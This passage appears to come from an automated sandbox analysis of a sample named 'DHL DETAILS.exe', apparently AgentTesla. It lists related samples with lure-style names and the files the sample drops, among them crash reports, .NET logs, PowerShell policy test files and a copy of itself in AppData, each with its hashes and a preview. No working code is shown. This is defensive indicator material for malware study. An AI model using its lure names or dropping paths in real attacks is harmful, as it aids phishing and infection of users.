	CHEMICAL SPECIFICATION.exe	Get hash	malicious	AgentTesla	Browse
	Quotation.pdf.exe	Get hash	malicious	AgentTesla	Browse
	file.exe	Get hash	malicious	AgentTesla	Browse
	file.exe	Get hash	malicious	AgentTesla	Browse
	QUOTATION#00913-1HNMR FORMONONETIN LIST.exe	Get hash	malicious	AgentTesla	Browse
	FAC- IST9G4VW.exe	Get hash	malicious	AgentTesla	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xe79025bf, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6585789190439364
Encrypted:	false
SSDEEP:	1536:UXESB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/T:Baza9v5hYe92UOHDnAPZ4PZf9h/9h
MD5:	6E32A0CDD6B767D83B674F469958370F
SHA1:	23DE78CF4FB2CCC607AB1FE1E4CB09F270468A77
SHA-256:	555B2A95DC9A7D0F4413252DD9E720CDCEFC26EED1510A17B92C0700A5DCAED1
SHA-512:	A267E62F90C3EC28F1DBF70C0DD8C045C2DDC4DBC6469759B7F055341AC7818C0E5BE2A0D2FD6A5E1BC0E36E6C89474BB267F6A16BDF677F9834D34D88AFC2A3
Malicious:	false
Preview:	.%.... ...............X\...;...{......................0.z..........{.......\|..h.\|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..........................................\|5..................I%......\|...........................#......h.\|.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_d2e81bc18818764af46188ab18e286c7b5d_a076064d_0f97c80e-3a0b-4df9-b014-53ec64cb05d6\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.497218151918031
Encrypted:	false
SSDEEP:	192:XME1DwD0x88bscaK5eFlJsfZFDBPotkdzuiF0Z24lO8DO:cE1Dwwx88bHaCUsPotczuiF0Y4lO8D
MD5:	92A8344C52A1B3694D071C35DE558843
SHA1:	028941A047FB6D616CBA96C5FF9E8E84C5DB5309
SHA-256:	AFC30C807857DC92E89CF9E2FA2ED8919347721B340B8E2E3935223A35FD998E
SHA-512:	3716FEE1394F54A41E90215133D0F13BBD07D20B6DE295E963BCB39A1F89DD73B516B97252E38630CAF8CD721F473EC650493F4D7F4231A6E6E43E15B01CDF16
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.4.6.0.1.3.7.2.1.9.0.5.9.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.4.6.0.1.8.0.3.9.0.9.2.2.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.9.7.c.8.0.e.-.3.a.0.b.-.4.d.f.9.-.b.0.1.4.-.5.3.e.c.6.4.c.b.0.5.d.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.f.0.4.6.d.2.d.-.7.d.f.8.-.4.e.4.6.-.8.9.6.4.-.b.a.6.8.3.a.3.d.0.0.0.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.s.s.a.l.a.m.A.l.a.i.k.u.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.a.8.4.8.-.0.0.0.1.-.0.0.1.4.-.a.f.3.7.-.6.6.5.d.1.b.7.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.e.b.a.1.c.a.4.c.f.8.9.a.1.0.4.e.4.e.d.4.1.8.3.e.f.9.b.0.9.9.5.0.0.0.0.0.0.0.0.!.0.0.0.0.9.e.3.a.8.d.6.6.b.1.a.7.8.8.b.2.6.2.f.0.4.7.f.c.0.e.1.3.8.3.0.2.9.2.9.1.1.d.5.b.!.s.v.c.h.o.s.t.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1829.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Sat Mar 9 12:15:55 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	13197949
Entropy (8bit):	2.1722204370579408
Encrypted:	false
SSDEEP:	24576:NFI2wdq/eRACtL8f3DGhYlWfd24JbqwzjTqAIlnvZQUd:uq2RAE2DGCed2abpOll
MD5:	E882D5E22373103458C5F0D4E24E2308
SHA1:	7E8125A63B520FCF0038A01C2D7915C4B8CDA6FB
SHA-256:	BBE869C6B04CA58A7441B48130729A5132C01D3B53B3562AA3466037782982E1
SHA-512:	94C9D131172E5865EDE45CA61AF240491394D86EA0F4FCD0CD4CFB098D22B1698F0EACCCE09840C0F2640D08C2930FC4201B4FFF9F080E75DEB425F79D77BD94
Malicious:	false
Preview:	MDMP..a..... ........R.e.............p...............w......<...........\|4..............7..........l.......8...........T............`..............\...........H...............................................................................eJ..............Lw......................T.......H....R.e............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC1B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	9130
Entropy (8bit):	3.711101132698766
Encrypted:	false
SSDEEP:	192:R6l7wVeJ47/56YEI8DSvbgmfL4JPprM89batpnfBY1m:R6lXJkB6YEzSgmfL41IpfL
MD5:	B87246A847158784BFA7AA17C787E773
SHA1:	6AA205C3F8E0A5F787CEEFE3EFEF0C314F32F7B9
SHA-256:	8C0CE72B2FC15A2B1D5E2DEA754A220EB5B957BF6CC109B92BA9B0CB87342EC9
SHA-512:	8557E155F01FC42A714CF275165153F1F07CF798E5345DA64CBEBAB44367BADC2B091583D09CE93B22AB24BFA10330ACBAF61927B31C704A4F934DA564FA2F0D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.0.8.0.<./.P.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC99.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4748
Entropy (8bit):	4.494674416001735
Encrypted:	false
SSDEEP:	48:cvIwWl8zsqJg771I9wjkkWpW8VYMYm8M4JCyetFNyq85KnZokdImhYd:uIjf4I7bi7VQJCDro0fhYd
MD5:	E4EE33B366C542E5D48F148CC7A0203D
SHA1:	0EA454C15919F0DC511A30C27953F1AE1A4C1912
SHA-256:	82B4C220D2449D553FA0129C6E9148FD39CCBD6D7E775D4D789DB62C013B93B9
SHA-512:	21751CB570B7653841FBBF6DBCCE61329F1880E32064A3F150AE99B26764843621314776778D1426F8C28528A4660F75B0AB79721D35C796D3F948CA42EA15C1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="227719" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBCB6.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	84624
Entropy (8bit):	3.098289870943429
Encrypted:	false
SSDEEP:	768:P/t3Jn998iLggqgeGIO79OSMCoXZcohoDp57cSvsx+GjJ+SsKyxeB:XlJsiLNqu79OSSXioup54SvY+MQiB
MD5:	23F3161E447775E9E89ADAF1245D3874
SHA1:	E985D2B4A66153B93A6BA52925997F4A26D9255F
SHA-256:	290280179098BB151E83E039F8A2930B047AF3FE75BEF79ECFE443D61AE94A19
SHA-512:	B911891AAF0750843017C53DE231BAF8D03F97ED3E550088CA15ADA3065B3FE997363F97FB9C01AD216563EF47F04C19DA8F3D0189299B9DD8AB85A02BF86255
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD92.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6950717450712136
Encrypted:	false
SSDEEP:	96:TiZYWqe0ERfYYIYssZmHMYEZR7Jt8in3RHCwXzua/R8McfxKzIHZ4:2ZD7WPS9Sa/R8McfxHHZ4
MD5:	4F5E29E3A2BBCC8F2D55A417EC21B833
SHA1:	6ACFBF6EFCEC79593DD25C6735B52A386D3F8CD6
SHA-256:	A20CF0272A9C5A9D5B02560479D0FEEDBA1B73A7F1FA105D9055890CB5BCBE41
SHA-512:	8D21A21B0B544BA24EFED31E7A69D0FAFDFFCE546EDFCD209A5445C8F39C01D59402E16F038D3AE402243D2638A96F6B9378F54887419F1854F6EA7DBF4B0D3F
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\Desktop\DHL DETAILS.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 69211 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	69211
Entropy (8bit):	7.995787876711886
Encrypted:	true
SSDEEP:	1536:4vHkVfDISE//aDY0WAXTF+0daIpyFQaqPZkatNjgkFOE4/JZZWnEn6:4vHKfMSeKFXdBcmnXkksE40E6
MD5:	753DF6889FD7410A2E9FE333DA83A429
SHA1:	3C425F16E8267186061DD48AC1C77C122962456E
SHA-256:	B42DC237E44CBC9A43400E7D3F9CBD406DBDEFD62BFE87328F8663897D69DF78
SHA-512:	9D56F79410AD0CF852C74C3EF9454E7AE86E80BDD6FF67773994B48CCAC71142BCF5C90635DA6A056E1406E81E64674DB9584928E867C55B77B59E2851CF6444
Malicious:	false
Preview:	MSCF....[.......,...................I..................WR. .authroot.stl..L...5..CK..<Tk...p.k:.]...k..-.o.d.}.N.F....!.....$t)K."..DE.....v..gr...}?>.<.s..<...{.t..\F.e.F...8&.<..>...t8....`dqM4.y..t8..t..3..1.`\.:+.<].F...3.~.M.B.....J....PR.+..UUUV.GY...8...._vl.....H}.s.Pq..r.<.0.lG.C..e(..oe........9..'8..m.......G8T......sR..&=.J....s.U......#...).j...x.....gq.+.N:.Wj...V.t...(J.;^..Mr~e..}.q....q....eo..O.....@.B.S.....66.\|!.(.........D!k..&.. /.....H~.....}.(..\|.S..~8..A..(.#..w.Y.....'.F...y&.8......f..49r..N...(zX.0;.....000.3c)Z.v.5N'.z...rNFw,E.NY..#ua.o.$..Y?.-.=....}d...]......x_<.W....ya.3.a..SQT.U..\|!.pyCA..-h..Y..>n......^.U.....H...EY.\.......}.-(....h..=xiV.O.W@p.=.r.i..c...c....S.x.;..GWf...=.:.....S.c/..v..3.iG<.&..%...8..=}.....+.n\?0"A.Y%<......+..O. .9..#..>.....5.2.j.1<.Z.>v..j...wr.i.:....!...;.N[.q..z9j..l.R.&,....$.V...k.j..Tc..m..D!%....".Y.#V."w.\|....L\| ..p........w.=..ck...<........{s..w..};../.=...k....YH.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\Desktop\DHL DETAILS.exe
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	3.122207559284839
Encrypted:	false
SSDEEP:	6:kK3cNXTN+SkQlPlEGYRMY9z+4KlDA3RUe1HEbpo:P8X8kPlE99SNxAhUe1HEVo
MD5:	39830678857B79A99DAAF06A36E3F810
SHA1:	5A876F0DE2896DEE872F0B6EAB9B21470BA1CB3B
SHA-256:	C46C2C78434BDA1AAD26E920594343DCA875816888C8AF1DDE9D9556A15672EE
SHA-512:	40455737B716D5267137A435A7FB21DB9C3F068DB69E2E700E636D64BB0167827B6A1B4A32213E13D51A88F23DCADD6F2CB5CDD53993C553017D95892D9FD47D
Malicious:	false
Preview:	p...... ........5.`."r..(....................................................... .........;.i......(...........[...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".2.c.8.3.b.1.3.b.a.f.6.9.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DHL DETAILS.exe.log

Download File

Process:	C:\Users\user\Desktop\DHL DETAILS.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1938
Entropy (8bit):	5.380045458118996
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkl+vxp3/elFH6HNpv:iq+wmj0qCYqGSI6oPtzHeqKksZp/elF6
MD5:	B9C6D7FFE24CE7F55C73477F8A6155CA
SHA1:	B3E4B555E4A4421E513FF38AF312B1F81AAB1BFF
SHA-256:	9EDE165289DC2B176C2EB4A9A3518F24A424795F81456AD631ACA1468E2242FB
SHA-512:	38C60EC1424F2AF775609E0E46E0CC245267BC794A7F50D78181409615222BAC4C2F5128975D3DBC06D4BE8FBD1EC6AF8B618CB489D6BEEE5A97D95CAC605915
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VHFSQv.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	841
Entropy (8bit):	5.351831766340675
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoIvEE4xDqE4j:MxHKlYHKh3oPtHo6wvEHxDqHj
MD5:	98DCC730A3C77DCDCA7CD8717EB5D42A
SHA1:	639509210C17EB73F5DB581FA8CA46B1157D8806
SHA-256:	E3C80885BCC7FE4F349EFB0470D261E0DE273EE26D47AF09C79F1B4B2F891E49
SHA-512:	7D11C53167839D428DAE35BF759C73FC0C7C49F2DE35CC99E4F8B69CDD40DFBEEF6D355F15FAB1EED62A64AF94E7BA311C0F8E07C3DA6F3A63410CC3E9882B78
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"Microsoft.Build.Framework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	19253
Entropy (8bit):	5.005213177851637
Encrypted:	false
SSDEEP:	384:JVib49PVoGIpN6KQkj2kkjh4iUxGhQw4h3OdB0NXp528vOjJwYo8YKib4o:JFPV3IpNBQkj2Nh4iUxGhl4h3OdB0NZf
MD5:	83CC0A063AE0CE6A770449E01B262D4C
SHA1:	C7CE3B64EDC6EE028A45E627CF26BF4FD53B71A1
SHA-256:	A9AEE05DF0FDCBF68D93BCDD148D152AA05DC301F6C7DA4E450C8D38AAF195AA
SHA-512:	BF95B77DBCDF81F4DE6D9D4CBCFDC286129CD413BE5C4196E22D9CDC8807FB9BC58C3F3F779157A85C9301EC4AC0EE12BB9E34F8B75AA6ED0C55DD80374D37A2
Malicious:	false
Preview:	PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvccy2c0.ikm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ganxgn2t.z24.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hviebdp3.zmz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsnvea42.qsx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mphwqxxf.uze.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
